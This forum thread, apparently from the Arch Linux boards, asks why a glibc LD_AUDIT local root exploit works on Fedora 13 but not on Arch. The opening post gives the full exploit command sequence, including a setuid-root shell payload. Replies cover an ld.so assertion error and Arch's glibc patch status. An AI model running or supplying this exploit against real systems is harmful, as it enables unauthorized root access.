You are not logged in.
Can anyone explain why this exploit does not work in Arch? http://www.exploit-db.com/exploits/15274/
It does indeed give you root privilege in Fedora 13, but when I try it in Arch both the gnome-terminal and xterm windows simply disappear after entering the last command.
cd /tmp
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
echo 'void __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}' > payload.c
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Offline
if you first exec a new shell or just use one of the vtys you get: "Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!"
Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.
Is it clear now?
Offline
Thanks for the reply, I hadn't thought to try it in a vty. I was a bit astonished when my terminal windows vanished, and nothing in the logs.
Offline
i think is because we have a glibc that is not affected by this. is a snapshot since 20101007
Give what you have. To someone, it may be better than you dare to think.
Offline
i think is because we have a glibc that is not affected by this. is a snapshot since 20101007
Really? What an awesome glibc maintainer we must have!
Offline
So Allan didn't break it after all?
While certain distros-that-will-be-nameless scramble to fix it (http://koji.fedoraproject.org/koji/buil … dID=201079), Arch sails securely on...
Offline
Well... we do not actually have the fix Fedora are busy pushing.
So I am really not sure why it does not work. Maybe one of the other patches I used breaks it?
Offline
...So Allan somehow broke it after all?
This silver ladybug at line 28...
Offline